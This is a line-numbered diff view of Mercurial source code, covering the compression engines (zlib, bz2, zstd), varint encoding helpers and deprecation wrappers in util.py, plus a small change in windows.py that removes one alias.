3647 class zlibrevlogcompressor(object):
3646 class zlibrevlogcompressor(object):
3648 def compress(self, data):
3647 def compress(self, data):
3649 insize = len(data)
3648 insize = len(data)
3650 # Caller handles empty input case.
3649 # Caller handles empty input case.
3651 assert insize > 0
3650 assert insize > 0
3652
3651
3653 if insize < 44:
3652 if insize < 44:
3654 return None
3653 return None
3655
3654
3656 elif insize <= 1000000:
3655 elif insize <= 1000000:
3657 compressed = zlib.compress(data)
3656 compressed = zlib.compress(data)
3658 if len(compressed) < insize:
3657 if len(compressed) < insize:
3659 return compressed
3658 return compressed
3660 return None
3659 return None
3661
3660
3662 # zlib makes an internal copy of the input buffer, doubling
3661 # zlib makes an internal copy of the input buffer, doubling
3663 # memory usage for large inputs. So do streaming compression
3662 # memory usage for large inputs. So do streaming compression
3664 # on large inputs.
3663 # on large inputs.
3665 else:
3664 else:
3666 z = zlib.compressobj()
3665 z = zlib.compressobj()
3667 parts = []
3666 parts = []
3668 pos = 0
3667 pos = 0
3669 while pos < insize:
3668 while pos < insize:
3670 pos2 = pos + 2**20
3669 pos2 = pos + 2**20
3671 parts.append(z.compress(data[pos:pos2]))
3670 parts.append(z.compress(data[pos:pos2]))
3672 pos = pos2
3671 pos = pos2
3673 parts.append(z.flush())
3672 parts.append(z.flush())
3674
3673
3675 if sum(map(len, parts)) < insize:
3674 if sum(map(len, parts)) < insize:
3676 return ''.join(parts)
3675 return ''.join(parts)
3677 return None
3676 return None
3678
3677
3679 def decompress(self, data):
3678 def decompress(self, data):
3680 try:
3679 try:
3681 return zlib.decompress(data)
3680 return zlib.decompress(data)
3682 except zlib.error as e:
3681 except zlib.error as e:
3683 raise error.RevlogError(_('revlog decompress error: %s') %
3682 raise error.RevlogError(_('revlog decompress error: %s') %
3684 stringutil.forcebytestr(e))
3683 stringutil.forcebytestr(e))
3685
3684
3686 def revlogcompressor(self, opts=None):
3685 def revlogcompressor(self, opts=None):
3687 return self.zlibrevlogcompressor()
3686 return self.zlibrevlogcompressor()
3688
3687
3689 compengines.register(_zlibengine())
3688 compengines.register(_zlibengine())
3690
3689
3691 class _bz2engine(compressionengine):
3690 class _bz2engine(compressionengine):
3692 def name(self):
3691 def name(self):
3693 return 'bz2'
3692 return 'bz2'
3694
3693
3695 def bundletype(self):
3694 def bundletype(self):
3696 """An algorithm that produces smaller bundles than ``gzip``.
3695 """An algorithm that produces smaller bundles than ``gzip``.
3697
3696
3698 All Mercurial clients should support this format.
3697 All Mercurial clients should support this format.
3699
3698
3700 This engine will likely produce smaller bundles than ``gzip`` but
3699 This engine will likely produce smaller bundles than ``gzip`` but
3701 will be significantly slower, both during compression and
3700 will be significantly slower, both during compression and
3702 decompression.
3701 decompression.
3703
3702
3704 If available, the ``zstd`` engine can yield similar or better
3703 If available, the ``zstd`` engine can yield similar or better
3705 compression at much higher speeds.
3704 compression at much higher speeds.
3706 """
3705 """
3707 return 'bzip2', 'BZ'
3706 return 'bzip2', 'BZ'
3708
3707
3709 # We declare a protocol name but don't advertise by default because
3708 # We declare a protocol name but don't advertise by default because
3710 # it is slow.
3709 # it is slow.
3711 def wireprotosupport(self):
3710 def wireprotosupport(self):
3712 return compewireprotosupport('bzip2', 0, 0)
3711 return compewireprotosupport('bzip2', 0, 0)
3713
3712
3714 def compressstream(self, it, opts=None):
3713 def compressstream(self, it, opts=None):
3715 opts = opts or {}
3714 opts = opts or {}
3716 z = bz2.BZ2Compressor(opts.get('level', 9))
3715 z = bz2.BZ2Compressor(opts.get('level', 9))
3717 for chunk in it:
3716 for chunk in it:
3718 data = z.compress(chunk)
3717 data = z.compress(chunk)
3719 if data:
3718 if data:
3720 yield data
3719 yield data
3721
3720
3722 yield z.flush()
3721 yield z.flush()
3723
3722
3724 def decompressorreader(self, fh):
3723 def decompressorreader(self, fh):
3725 def gen():
3724 def gen():
3726 d = bz2.BZ2Decompressor()
3725 d = bz2.BZ2Decompressor()
3727 for chunk in filechunkiter(fh):
3726 for chunk in filechunkiter(fh):
3728 yield d.decompress(chunk)
3727 yield d.decompress(chunk)
3729
3728
3730 return chunkbuffer(gen())
3729 return chunkbuffer(gen())
3731
3730
3732 compengines.register(_bz2engine())
3731 compengines.register(_bz2engine())
3733
3732
3734 class _truncatedbz2engine(compressionengine):
3733 class _truncatedbz2engine(compressionengine):
3735 def name(self):
3734 def name(self):
3736 return 'bz2truncated'
3735 return 'bz2truncated'
3737
3736
3738 def bundletype(self):
3737 def bundletype(self):
3739 return None, '_truncatedBZ'
3738 return None, '_truncatedBZ'
3740
3739
3741 # We don't implement compressstream because it is hackily handled elsewhere.
3740 # We don't implement compressstream because it is hackily handled elsewhere.
3742
3741
3743 def decompressorreader(self, fh):
3742 def decompressorreader(self, fh):
3744 def gen():
3743 def gen():
3745 # The input stream doesn't have the 'BZ' header. So add it back.
3744 # The input stream doesn't have the 'BZ' header. So add it back.
3746 d = bz2.BZ2Decompressor()
3745 d = bz2.BZ2Decompressor()
3747 d.decompress('BZ')
3746 d.decompress('BZ')
3748 for chunk in filechunkiter(fh):
3747 for chunk in filechunkiter(fh):
3749 yield d.decompress(chunk)
3748 yield d.decompress(chunk)
3750
3749
3751 return chunkbuffer(gen())
3750 return chunkbuffer(gen())
3752
3751
3753 compengines.register(_truncatedbz2engine())
3752 compengines.register(_truncatedbz2engine())
3754
3753
3755 class _noopengine(compressionengine):
3754 class _noopengine(compressionengine):
3756 def name(self):
3755 def name(self):
3757 return 'none'
3756 return 'none'
3758
3757
3759 def bundletype(self):
3758 def bundletype(self):
3760 """No compression is performed.
3759 """No compression is performed.
3761
3760
3762 Use this compression engine to explicitly disable compression.
3761 Use this compression engine to explicitly disable compression.
3763 """
3762 """
3764 return 'none', 'UN'
3763 return 'none', 'UN'
3765
3764
3766 # Clients always support uncompressed payloads. Servers don't because
3765 # Clients always support uncompressed payloads. Servers don't because
3767 # unless you are on a fast network, uncompressed payloads can easily
3766 # unless you are on a fast network, uncompressed payloads can easily
3768 # saturate your network pipe.
3767 # saturate your network pipe.
3769 def wireprotosupport(self):
3768 def wireprotosupport(self):
3770 return compewireprotosupport('none', 0, 10)
3769 return compewireprotosupport('none', 0, 10)
3771
3770
3772 # We don't implement revlogheader because it is handled specially
3771 # We don't implement revlogheader because it is handled specially
3773 # in the revlog class.
3772 # in the revlog class.
3774
3773
3775 def compressstream(self, it, opts=None):
3774 def compressstream(self, it, opts=None):
3776 return it
3775 return it
3777
3776
3778 def decompressorreader(self, fh):
3777 def decompressorreader(self, fh):
3779 return fh
3778 return fh
3780
3779
3781 class nooprevlogcompressor(object):
3780 class nooprevlogcompressor(object):
3782 def compress(self, data):
3781 def compress(self, data):
3783 return None
3782 return None
3784
3783
3785 def revlogcompressor(self, opts=None):
3784 def revlogcompressor(self, opts=None):
3786 return self.nooprevlogcompressor()
3785 return self.nooprevlogcompressor()
3787
3786
3788 compengines.register(_noopengine())
3787 compengines.register(_noopengine())
3789
3788
3790 class _zstdengine(compressionengine):
3789 class _zstdengine(compressionengine):
3791 def name(self):
3790 def name(self):
3792 return 'zstd'
3791 return 'zstd'
3793
3792
3794 @propertycache
3793 @propertycache
3795 def _module(self):
3794 def _module(self):
3796 # Not all installs have the zstd module available. So defer importing
3795 # Not all installs have the zstd module available. So defer importing
3797 # until first access.
3796 # until first access.
3798 try:
3797 try:
3799 from . import zstd
3798 from . import zstd
3800 # Force delayed import.
3799 # Force delayed import.
3801 zstd.__version__
3800 zstd.__version__
3802 return zstd
3801 return zstd
3803 except ImportError:
3802 except ImportError:
3804 return None
3803 return None
3805
3804
3806 def available(self):
3805 def available(self):
3807 return bool(self._module)
3806 return bool(self._module)
3808
3807
3809 def bundletype(self):
3808 def bundletype(self):
3810 """A modern compression algorithm that is fast and highly flexible.
3809 """A modern compression algorithm that is fast and highly flexible.
3811
3810
3812 Only supported by Mercurial 4.1 and newer clients.
3811 Only supported by Mercurial 4.1 and newer clients.
3813
3812
3814 With the default settings, zstd compression is both faster and yields
3813 With the default settings, zstd compression is both faster and yields
3815 better compression than ``gzip``. It also frequently yields better
3814 better compression than ``gzip``. It also frequently yields better
3816 compression than ``bzip2`` while operating at much higher speeds.
3815 compression than ``bzip2`` while operating at much higher speeds.
3817
3816
3818 If this engine is available and backwards compatibility is not a
3817 If this engine is available and backwards compatibility is not a
3819 concern, it is likely the best available engine.
3818 concern, it is likely the best available engine.
3820 """
3819 """
3821 return 'zstd', 'ZS'
3820 return 'zstd', 'ZS'
3822
3821
3823 def wireprotosupport(self):
3822 def wireprotosupport(self):
3824 return compewireprotosupport('zstd', 50, 50)
3823 return compewireprotosupport('zstd', 50, 50)
3825
3824
3826 def revlogheader(self):
3825 def revlogheader(self):
3827 return '\x28'
3826 return '\x28'
3828
3827
3829 def compressstream(self, it, opts=None):
3828 def compressstream(self, it, opts=None):
3830 opts = opts or {}
3829 opts = opts or {}
3831 # zstd level 3 is almost always significantly faster than zlib
3830 # zstd level 3 is almost always significantly faster than zlib
3832 # while providing no worse compression. It strikes a good balance
3831 # while providing no worse compression. It strikes a good balance
3833 # between speed and compression.
3832 # between speed and compression.
3834 level = opts.get('level', 3)
3833 level = opts.get('level', 3)
3835
3834
3836 zstd = self._module
3835 zstd = self._module
3837 z = zstd.ZstdCompressor(level=level).compressobj()
3836 z = zstd.ZstdCompressor(level=level).compressobj()
3838 for chunk in it:
3837 for chunk in it:
3839 data = z.compress(chunk)
3838 data = z.compress(chunk)
3840 if data:
3839 if data:
3841 yield data
3840 yield data
3842
3841
3843 yield z.flush()
3842 yield z.flush()
3844
3843
3845 def decompressorreader(self, fh):
3844 def decompressorreader(self, fh):
3846 zstd = self._module
3845 zstd = self._module
3847 dctx = zstd.ZstdDecompressor()
3846 dctx = zstd.ZstdDecompressor()
3848 return chunkbuffer(dctx.read_from(fh))
3847 return chunkbuffer(dctx.read_from(fh))
3849
3848
3850 class zstdrevlogcompressor(object):
3849 class zstdrevlogcompressor(object):
3851 def __init__(self, zstd, level=3):
3850 def __init__(self, zstd, level=3):
3852 # Writing the content size adds a few bytes to the output. However,
3851 # Writing the content size adds a few bytes to the output. However,
3853 # it allows decompression to be more optimal since we can
3852 # it allows decompression to be more optimal since we can
3854 # pre-allocate a buffer to hold the result.
3853 # pre-allocate a buffer to hold the result.
3855 self._cctx = zstd.ZstdCompressor(level=level,
3854 self._cctx = zstd.ZstdCompressor(level=level,
3856 write_content_size=True)
3855 write_content_size=True)
3857 self._dctx = zstd.ZstdDecompressor()
3856 self._dctx = zstd.ZstdDecompressor()
3858 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3857 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3859 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3858 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3860
3859
3861 def compress(self, data):
3860 def compress(self, data):
3862 insize = len(data)
3861 insize = len(data)
3863 # Caller handles empty input case.
3862 # Caller handles empty input case.
3864 assert insize > 0
3863 assert insize > 0
3865
3864
3866 if insize < 50:
3865 if insize < 50:
3867 return None
3866 return None
3868
3867
3869 elif insize <= 1000000:
3868 elif insize <= 1000000:
3870 compressed = self._cctx.compress(data)
3869 compressed = self._cctx.compress(data)
3871 if len(compressed) < insize:
3870 if len(compressed) < insize:
3872 return compressed
3871 return compressed
3873 return None
3872 return None
3874 else:
3873 else:
3875 z = self._cctx.compressobj()
3874 z = self._cctx.compressobj()
3876 chunks = []
3875 chunks = []
3877 pos = 0
3876 pos = 0
3878 while pos < insize:
3877 while pos < insize:
3879 pos2 = pos + self._compinsize
3878 pos2 = pos + self._compinsize
3880 chunk = z.compress(data[pos:pos2])
3879 chunk = z.compress(data[pos:pos2])
3881 if chunk:
3880 if chunk:
3882 chunks.append(chunk)
3881 chunks.append(chunk)
3883 pos = pos2
3882 pos = pos2
3884 chunks.append(z.flush())
3883 chunks.append(z.flush())
3885
3884
3886 if sum(map(len, chunks)) < insize:
3885 if sum(map(len, chunks)) < insize:
3887 return ''.join(chunks)
3886 return ''.join(chunks)
3888 return None
3887 return None
3889
3888
3890 def decompress(self, data):
3889 def decompress(self, data):
3891 insize = len(data)
3890 insize = len(data)
3892
3891
3893 try:
3892 try:
3894 # This was measured to be faster than other streaming
3893 # This was measured to be faster than other streaming
3895 # decompressors.
3894 # decompressors.
3896 dobj = self._dctx.decompressobj()
3895 dobj = self._dctx.decompressobj()
3897 chunks = []
3896 chunks = []
3898 pos = 0
3897 pos = 0
3899 while pos < insize:
3898 while pos < insize:
3900 pos2 = pos + self._decompinsize
3899 pos2 = pos + self._decompinsize
3901 chunk = dobj.decompress(data[pos:pos2])
3900 chunk = dobj.decompress(data[pos:pos2])
3902 if chunk:
3901 if chunk:
3903 chunks.append(chunk)
3902 chunks.append(chunk)
3904 pos = pos2
3903 pos = pos2
3905 # Frame should be exhausted, so no finish() API.
3904 # Frame should be exhausted, so no finish() API.
3906
3905
3907 return ''.join(chunks)
3906 return ''.join(chunks)
3908 except Exception as e:
3907 except Exception as e:
3909 raise error.RevlogError(_('revlog decompress error: %s') %
3908 raise error.RevlogError(_('revlog decompress error: %s') %
3910 stringutil.forcebytestr(e))
3909 stringutil.forcebytestr(e))
3911
3910
3912 def revlogcompressor(self, opts=None):
3911 def revlogcompressor(self, opts=None):
3913 opts = opts or {}
3912 opts = opts or {}
3914 return self.zstdrevlogcompressor(self._module,
3913 return self.zstdrevlogcompressor(self._module,
3915 level=opts.get('level', 3))
3914 level=opts.get('level', 3))
3916
3915
3917 compengines.register(_zstdengine())
3916 compengines.register(_zstdengine())
3918
3917
3919 def bundlecompressiontopics():
3918 def bundlecompressiontopics():
3920 """Obtains a list of available bundle compressions for use in help."""
3919 """Obtains a list of available bundle compressions for use in help."""
3921 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3920 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3922 items = {}
3921 items = {}
3923
3922
3924 # We need to format the docstring. So use a dummy object/type to hold it
3923 # We need to format the docstring. So use a dummy object/type to hold it
3925 # rather than mutating the original.
3924 # rather than mutating the original.
3926 class docobject(object):
3925 class docobject(object):
3927 pass
3926 pass
3928
3927
3929 for name in compengines:
3928 for name in compengines:
3930 engine = compengines[name]
3929 engine = compengines[name]
3931
3930
3932 if not engine.available():
3931 if not engine.available():
3933 continue
3932 continue
3934
3933
3935 bt = engine.bundletype()
3934 bt = engine.bundletype()
3936 if not bt or not bt[0]:
3935 if not bt or not bt[0]:
3937 continue
3936 continue
3938
3937
3939 doc = pycompat.sysstr('``%s``\n %s') % (
3938 doc = pycompat.sysstr('``%s``\n %s') % (
3940 bt[0], engine.bundletype.__doc__)
3939 bt[0], engine.bundletype.__doc__)
3941
3940
3942 value = docobject()
3941 value = docobject()
3943 value.__doc__ = doc
3942 value.__doc__ = doc
3944 value._origdoc = engine.bundletype.__doc__
3943 value._origdoc = engine.bundletype.__doc__
3945 value._origfunc = engine.bundletype
3944 value._origfunc = engine.bundletype
3946
3945
3947 items[bt[0]] = value
3946 items[bt[0]] = value
3948
3947
3949 return items
3948 return items
3950
3949
3951 i18nfunctions = bundlecompressiontopics().values()
3950 i18nfunctions = bundlecompressiontopics().values()
3952
3951
3953 # convenient shortcut
3952 # convenient shortcut
3954 dst = debugstacktrace
3953 dst = debugstacktrace
3955
3954
3956 def safename(f, tag, ctx, others=None):
3955 def safename(f, tag, ctx, others=None):
3957 """
3956 """
3958 Generate a name that it is safe to rename f to in the given context.
3957 Generate a name that it is safe to rename f to in the given context.
3959
3958
3960 f: filename to rename
3959 f: filename to rename
3961 tag: a string tag that will be included in the new name
3960 tag: a string tag that will be included in the new name
3962 ctx: a context, in which the new name must not exist
3961 ctx: a context, in which the new name must not exist
3963 others: a set of other filenames that the new name must not be in
3962 others: a set of other filenames that the new name must not be in
3964
3963
3965 Returns a file name of the form oldname~tag[~number] which does not exist
3964 Returns a file name of the form oldname~tag[~number] which does not exist
3966 in the provided context and is not in the set of other names.
3965 in the provided context and is not in the set of other names.
3967 """
3966 """
3968 if others is None:
3967 if others is None:
3969 others = set()
3968 others = set()
3970
3969
3971 fn = '%s~%s' % (f, tag)
3970 fn = '%s~%s' % (f, tag)
3972 if fn not in ctx and fn not in others:
3971 if fn not in ctx and fn not in others:
3973 return fn
3972 return fn
3974 for n in itertools.count(1):
3973 for n in itertools.count(1):
3975 fn = '%s~%s~%s' % (f, tag, n)
3974 fn = '%s~%s~%s' % (f, tag, n)
3976 if fn not in ctx and fn not in others:
3975 if fn not in ctx and fn not in others:
3977 return fn
3976 return fn
3978
3977
3979 def readexactly(stream, n):
3978 def readexactly(stream, n):
3980 '''read n bytes from stream.read and abort if less was available'''
3979 '''read n bytes from stream.read and abort if less was available'''
3981 s = stream.read(n)
3980 s = stream.read(n)
3982 if len(s) < n:
3981 if len(s) < n:
3983 raise error.Abort(_("stream ended unexpectedly"
3982 raise error.Abort(_("stream ended unexpectedly"
3984 " (got %d bytes, expected %d)")
3983 " (got %d bytes, expected %d)")
3985 % (len(s), n))
3984 % (len(s), n))
3986 return s
3985 return s
3987
3986
3988 def uvarintencode(value):
3987 def uvarintencode(value):
3989 """Encode an unsigned integer value to a varint.
3988 """Encode an unsigned integer value to a varint.
3990
3989
3991 A varint is a variable length integer of 1 or more bytes. Each byte
3990 A varint is a variable length integer of 1 or more bytes. Each byte
3992 except the last has the most significant bit set. The lower 7 bits of
3991 except the last has the most significant bit set. The lower 7 bits of
3993 each byte store the 2's complement representation, least significant group
3992 each byte store the 2's complement representation, least significant group
3994 first.
3993 first.
3995
3994
3996 >>> uvarintencode(0)
3995 >>> uvarintencode(0)
3997 '\\x00'
3996 '\\x00'
3998 >>> uvarintencode(1)
3997 >>> uvarintencode(1)
3999 '\\x01'
3998 '\\x01'
4000 >>> uvarintencode(127)
3999 >>> uvarintencode(127)
4001 '\\x7f'
4000 '\\x7f'
4002 >>> uvarintencode(1337)
4001 >>> uvarintencode(1337)
4003 '\\xb9\\n'
4002 '\\xb9\\n'
4004 >>> uvarintencode(65536)
4003 >>> uvarintencode(65536)
4005 '\\x80\\x80\\x04'
4004 '\\x80\\x80\\x04'
4006 >>> uvarintencode(-1)
4005 >>> uvarintencode(-1)
4007 Traceback (most recent call last):
4006 Traceback (most recent call last):
4008 ...
4007 ...
4009 ProgrammingError: negative value for uvarint: -1
4008 ProgrammingError: negative value for uvarint: -1
4010 """
4009 """
4011 if value < 0:
4010 if value < 0:
4012 raise error.ProgrammingError('negative value for uvarint: %d'
4011 raise error.ProgrammingError('negative value for uvarint: %d'
4013 % value)
4012 % value)
4014 bits = value & 0x7f
4013 bits = value & 0x7f
4015 value >>= 7
4014 value >>= 7
4016 bytes = []
4015 bytes = []
4017 while value:
4016 while value:
4018 bytes.append(pycompat.bytechr(0x80 | bits))
4017 bytes.append(pycompat.bytechr(0x80 | bits))
4019 bits = value & 0x7f
4018 bits = value & 0x7f
4020 value >>= 7
4019 value >>= 7
4021 bytes.append(pycompat.bytechr(bits))
4020 bytes.append(pycompat.bytechr(bits))
4022
4021
4023 return ''.join(bytes)
4022 return ''.join(bytes)
4024
4023
4025 def uvarintdecodestream(fh):
4024 def uvarintdecodestream(fh):
4026 """Decode an unsigned variable length integer from a stream.
4025 """Decode an unsigned variable length integer from a stream.
4027
4026
4028 The passed argument is anything that has a ``.read(N)`` method.
4027 The passed argument is anything that has a ``.read(N)`` method.
4029
4028
4030 >>> try:
4029 >>> try:
4031 ... from StringIO import StringIO as BytesIO
4030 ... from StringIO import StringIO as BytesIO
4032 ... except ImportError:
4031 ... except ImportError:
4033 ... from io import BytesIO
4032 ... from io import BytesIO
4034 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4033 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4035 0
4034 0
4036 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4035 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4037 1
4036 1
4038 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4037 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4039 127
4038 127
4040 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4039 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4041 1337
4040 1337
4042 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4041 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4043 65536
4042 65536
4044 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4043 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4045 Traceback (most recent call last):
4044 Traceback (most recent call last):
4046 ...
4045 ...
4047 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4046 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4048 """
4047 """
4049 result = 0
4048 result = 0
4050 shift = 0
4049 shift = 0
4051 while True:
4050 while True:
4052 byte = ord(readexactly(fh, 1))
4051 byte = ord(readexactly(fh, 1))
4053 result |= ((byte & 0x7f) << shift)
4052 result |= ((byte & 0x7f) << shift)
4054 if not (byte & 0x80):
4053 if not (byte & 0x80):
4055 return result
4054 return result
4056 shift += 7
4055 shift += 7
4057
4056
4058 ###
4057 ###
4059 # Deprecation warnings for util.py splitting
4058 # Deprecation warnings for util.py splitting
4060 ###
4059 ###
4061
4060
4062 def _deprecatedfunc(func, version):
4061 def _deprecatedfunc(func, version):
4063 def wrapped(*args, **kwargs):
4062 def wrapped(*args, **kwargs):
4064 fn = pycompat.sysbytes(func.__name__)
4063 fn = pycompat.sysbytes(func.__name__)
4065 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
4064 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
4066 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
4065 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
4067 nouideprecwarn(msg, version)
4066 nouideprecwarn(msg, version)
4068 return func(*args, **kwargs)
4067 return func(*args, **kwargs)
4069 wrapped.__name__ = func.__name__
4068 wrapped.__name__ = func.__name__
4070 return wrapped
4069 return wrapped
4071
4070
4072 defaultdateformats = dateutil.defaultdateformats
4071 defaultdateformats = dateutil.defaultdateformats
4073 extendeddateformats = dateutil.extendeddateformats
4072 extendeddateformats = dateutil.extendeddateformats
4074 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
4073 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
4075 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
4074 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
4076 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
4075 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
4077 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
4076 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
4078 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
4077 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
4079 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
4078 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
4080 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
4079 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
4081
4080
4082 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
4081 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
4083 binary = _deprecatedfunc(stringutil.binary, '4.6')
4082 binary = _deprecatedfunc(stringutil.binary, '4.6')
4084 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
4083 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
4085 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
4084 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
4086 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
4085 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
4087 email = _deprecatedfunc(stringutil.email, '4.6')
4086 email = _deprecatedfunc(stringutil.email, '4.6')
4088 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
4087 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
4089 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
4088 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
4090 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
4089 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
4091 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
4090 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
4092 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
4091 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
4093 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
4092 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
4094 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
4093 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
@@ -1,496 +1,495 b''
1 # windows.py - Windows utility function implementations for Mercurial
1 # windows.py - Windows utility function implementations for Mercurial
2 #
2 #
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import msvcrt
11 import msvcrt
12 import os
12 import os
13 import re
13 import re
14 import stat
14 import stat
15 import sys
15 import sys
16
16
17 from .i18n import _
17 from .i18n import _
18 from . import (
18 from . import (
19 encoding,
19 encoding,
20 error,
20 error,
21 policy,
21 policy,
22 pycompat,
22 pycompat,
23 win32,
23 win32,
24 )
24 )
25
25
26 try:
26 try:
27 import _winreg as winreg
27 import _winreg as winreg
28 winreg.CloseKey
28 winreg.CloseKey
29 except ImportError:
29 except ImportError:
30 import winreg
30 import winreg
31
31
32 osutil = policy.importmod(r'osutil')
32 osutil = policy.importmod(r'osutil')
33
33
34 executablepath = win32.executablepath
35 getfsmountpoint = win32.getvolumename
34 getfsmountpoint = win32.getvolumename
36 getfstype = win32.getfstype
35 getfstype = win32.getfstype
37 getuser = win32.getuser
36 getuser = win32.getuser
38 hidewindow = win32.hidewindow
37 hidewindow = win32.hidewindow
39 makedir = win32.makedir
38 makedir = win32.makedir
40 nlinks = win32.nlinks
39 nlinks = win32.nlinks
41 oslink = win32.oslink
40 oslink = win32.oslink
42 samedevice = win32.samedevice
41 samedevice = win32.samedevice
43 samefile = win32.samefile
42 samefile = win32.samefile
44 setsignalhandler = win32.setsignalhandler
43 setsignalhandler = win32.setsignalhandler
45 spawndetached = win32.spawndetached
44 spawndetached = win32.spawndetached
46 split = os.path.split
45 split = os.path.split
47 testpid = win32.testpid
46 testpid = win32.testpid
48 unlink = win32.unlink
47 unlink = win32.unlink
49
48
50 umask = 0o022
49 umask = 0o022
51
50
52 class mixedfilemodewrapper(object):
51 class mixedfilemodewrapper(object):
53 """Wraps a file handle when it is opened in read/write mode.
52 """Wraps a file handle when it is opened in read/write mode.
54
53
55 fopen() and fdopen() on Windows have a specific-to-Windows requirement
54 fopen() and fdopen() on Windows have a specific-to-Windows requirement
56 that files opened with mode r+, w+, or a+ make a call to a file positioning
55 that files opened with mode r+, w+, or a+ make a call to a file positioning
57 function when switching between reads and writes. Without this extra call,
56 function when switching between reads and writes. Without this extra call,
58 Python will raise a not very intuitive "IOError: [Errno 0] Error."
57 Python will raise a not very intuitive "IOError: [Errno 0] Error."
59
58
60 This class wraps posixfile instances when the file is opened in read/write
59 This class wraps posixfile instances when the file is opened in read/write
61 mode and automatically adds checks or inserts appropriate file positioning
60 mode and automatically adds checks or inserts appropriate file positioning
62 calls when necessary.
61 calls when necessary.
63 """
62 """
64 OPNONE = 0
63 OPNONE = 0
65 OPREAD = 1
64 OPREAD = 1
66 OPWRITE = 2
65 OPWRITE = 2
67
66
68 def __init__(self, fp):
67 def __init__(self, fp):
69 object.__setattr__(self, r'_fp', fp)
68 object.__setattr__(self, r'_fp', fp)
70 object.__setattr__(self, r'_lastop', 0)
69 object.__setattr__(self, r'_lastop', 0)
71
70
72 def __enter__(self):
71 def __enter__(self):
73 return self._fp.__enter__()
72 return self._fp.__enter__()
74
73
75 def __exit__(self, exc_type, exc_val, exc_tb):
74 def __exit__(self, exc_type, exc_val, exc_tb):
76 self._fp.__exit__(exc_type, exc_val, exc_tb)
75 self._fp.__exit__(exc_type, exc_val, exc_tb)
77
76
78 def __getattr__(self, name):
77 def __getattr__(self, name):
79 return getattr(self._fp, name)
78 return getattr(self._fp, name)
80
79
81 def __setattr__(self, name, value):
80 def __setattr__(self, name, value):
82 return self._fp.__setattr__(name, value)
81 return self._fp.__setattr__(name, value)
83
82
84 def _noopseek(self):
83 def _noopseek(self):
85 self._fp.seek(0, os.SEEK_CUR)
84 self._fp.seek(0, os.SEEK_CUR)
86
85
87 def seek(self, *args, **kwargs):
86 def seek(self, *args, **kwargs):
88 object.__setattr__(self, r'_lastop', self.OPNONE)
87 object.__setattr__(self, r'_lastop', self.OPNONE)
89 return self._fp.seek(*args, **kwargs)
88 return self._fp.seek(*args, **kwargs)
90
89
91 def write(self, d):
90 def write(self, d):
92 if self._lastop == self.OPREAD:
91 if self._lastop == self.OPREAD:
93 self._noopseek()
92 self._noopseek()
94
93
95 object.__setattr__(self, r'_lastop', self.OPWRITE)
94 object.__setattr__(self, r'_lastop', self.OPWRITE)
96 return self._fp.write(d)
95 return self._fp.write(d)
97
